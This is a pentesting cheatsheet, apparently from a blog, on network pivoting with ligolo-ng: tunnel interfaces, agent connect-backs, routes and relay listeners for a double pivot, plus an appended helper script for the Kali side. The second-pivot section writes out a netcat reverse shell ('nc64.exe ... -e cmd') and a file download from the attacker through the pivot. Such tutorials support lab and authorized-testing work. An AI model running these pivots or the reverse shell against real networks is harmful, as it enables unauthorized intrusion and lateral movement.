https://ph03n1x.net/ligolo-cheatsheet/

# Local Port Forwarding to your Kali

When you find a website that is reachable only from the target, or a service that listens only on the target's loopback, you need local port forwarding. With ligolo-ng you don't need `proxychains`: the tunnel is a real network interface on Kali, so every tool uses it directly. Services bound to the agent's own `127.0.0.1` become reachable through the reserved address `240.0.0.1` once the "magic" route below is in place. `-ignore-cert` disables TLS verification of the proxy's self-signed certificate; that is fine in a lab, but on a real engagement pin a proper certificate instead.

```bash
# On your Kali terminal, create a new tun interface called 'ligolo'
# It requires sudo rights; <user> is the account that will run the proxy
sudo ip tuntap add user <user> mode tun ligolo
sudo ip link set ligolo up

# when you need to delete it (routes attached to it disappear with it)
sudo ip link del ligolo

# Run the proxy on your Kali (listens on 0.0.0.0:11601 by default)
./proxy -selfcert

# connect the agent to your proxy
.\agent.exe -connect <kali_ip>:11601 -ignore-cert

# select an agent session in the proxy UI
session

# in the proxy, with the new session selected, attach it to ligolo
start --tun ligolo

# Add the magic route: 240.0.0.1 maps to the agent's 127.0.0.1, so ports that
# listen only on the target's loopback are reachable locally from Kali
sudo ip route add 240.0.0.1/32 dev ligolo
```

# Set up with your config

```bash
# tun0 on Kali (VPN)        192.168.1.10
# 1st machine external IP   192.168.1.13
# 1st machine internal IP   10.10.10.10
# 2nd machine external IP   10.10.10.13
# 2nd machine internal IP   11.11.11.11
```

# 1st pivot on 1st internal range

```bash
# 1. Create and bring up tunnel1 (Kali terminal)
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up

# 2. Start the ligolo proxy on Kali with sudo
sudo ./proxy -selfcert

# 3. Upload the agent to the 1st machine and connect it back to the proxy on Kali's VPN IP
.\agent.exe -connect 192.168.1.10:11601 -ignore-cert   # windows
./agent -connect 192.168.1.10:11601 -ignore-cert       # linux

# in the proxy, select the agent session
session

# 4. Start the tunnel (newer ligolo-ng releases name this command tunnel_start)
start --tun ligolo   # or simply: start

# 5. Add a route to the 1st internal subnet through the tunnel
sudo ip route add 10.10.10.0/24 dev ligolo

# 6. Listener on the 1st agent: port 11601 on the 1st machine is relayed to the
#    proxy on Kali, so agents deeper in the network can connect to 10.10.10.10:11601
#    without any route to Kali (listener_add applies to the currently selected session)
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

# 7. Test reachability of the 1st internal subnet
nxc smb 10.10.10.0/24
```

# 2nd pivot on 2nd internal range

```bash
# 1. Create and bring up tunnel2 (Kali terminal)
sudo ip tuntap add user <user> mode tun tunnel2
sudo ip link set tunnel2 up

# 2. Connect the new agent (running on the 2nd machine) to the 1st machine's internal IP;
#    the listener from the 1st pivot relays it to the proxy on Kali
.\agent.exe -connect 10.10.10.10:11601 -ignore-cert

# 3. Select the new agent session in the proxy
session
# make sure you are on the right session before starting the tunnel
start --tun tunnel2

# 4. Add a route to the 2nd internal subnet
sudo ip route add 11.11.11.0/24 dev tunnel2

# 5. Add listeners for the whitelisted ports the 2nd machine is allowed to reach.
#    Select the 1st agent's session first: the listeners must live on the 1st machine,
#    because that is the host the 2nd machine will talk to
listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443 --tcp
listener_add --addr 0.0.0.0:80 --to 127.0.0.1:80 --tcp

# 6. On the 2nd machine, download a file from Kali via the 1st machine's internal IP
#    (PowerShell: wget is an alias of Invoke-WebRequest; serve the file on Kali port 80,
#    which is where the 10.10.10.10:80 listener delivers the request)
wget http://10.10.10.10/wook -OutFile wook

# 7. Reverse shell from the 2nd machine: it connects to 10.10.10.10:443, which the
#    listener relays to 127.0.0.1:443 on Kali, so your catcher must listen on Kali port 443
nc64.exe 10.10.10.10 443 -e cmd

# 8. Test reachability on the 2nd subnet
nxc smb 11.11.11.0/24
```
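The Kali-side part of both pivots above (create the tun device, bring it up, add routes, tear down) is the same sequence each time, so here it is as a small helper script. This is an added example, not code from the cheatsheet or from the ligolo-ng project. It assumes `iproute2` and sudo rights; the interface name, the owning user and the subnets are arguments chosen by the operator. `DRY_RUN=1` prints the privileged commands instead of executing them, and every CIDR is validated before it reaches `ip route`, so a mistyped subnet cannot silently add a bogus route.

```sh
#!/bin/sh
# ligolo-tun.sh: Kali-side bring-up / tear-down for a ligolo-ng tun interface.
# Added example, not part of the ph03n1x cheatsheet or of ligolo-ng itself.
# Assumes iproute2 and sudo; interface name, owner and subnets are operator-supplied.
set -eu

# Execute a privileged command, or just print it when DRY_RUN=1 (review/test without root).
run() {
  if [ "${DRY_RUN:-0}" = "1" ]; then
    printf 'sudo %s\n' "$*"
  else
    sudo "$@"
  fi
}

# Accept only dotted-quad/prefix with every octet <= 255 and a prefix of 0-32.
# Anything else is rejected before it is handed to `ip route`.
valid_cidr() {
  printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}/([0-9]|[12][0-9]|3[0-2])$' || return 1
  # subshell keeps the IFS change from leaking into the caller
  ( IFS=.; set -- ${1%/*}; for o; do [ "$o" -le 255 ] || exit 1; done )
}

# Create the tun device owned by $2 (the user that runs the proxy) and bring it up.
tun_up() {
  run ip tuntap add user "$2" mode tun "$1"
  run ip link set "$1" up
}

# Route one subnet through the tunnel interface, refusing malformed input.
route_add() {
  valid_cidr "$2" || { echo "route_add: invalid CIDR '$2'" >&2; return 1; }
  run ip route add "$2" dev "$1"
}

# Delete the interface; the kernel drops every route that pointed at it.
tun_down() {
  run ip link del "$1"
}

# pivot_setup IFACE USER CIDR...: one call per pivot, for example
#   pivot_setup ligolo kali 10.10.10.0/24 240.0.0.1/32
pivot_setup() {
  [ $# -ge 3 ] || { echo "pivot_setup: need IFACE USER CIDR..." >&2; return 2; }
  iface=$1; owner=$2; shift 2
  tun_up "$iface" "$owner"
  for cidr; do
    route_add "$iface" "$cidr"
  done
}

# Dispatch only when invoked with arguments; otherwise the file just defines the functions.
case "${1:-}" in
  up)   shift; pivot_setup "$@" ;;
  down) shift; tun_down "$@" ;;
  "")   ;;
  *)    echo "usage: $0 up IFACE USER CIDR... | down IFACE" >&2; exit 2 ;;
esac
```

Run `DRY_RUN=1 ./ligolo-tun.sh up tunnel2 kali 11.11.11.0/24` first to see exactly which `ip` commands will be issued, then drop `DRY_RUN` to apply them; `./ligolo-tun.sh down tunnel2` removes the interface and its routes when the pivot is no longer needed.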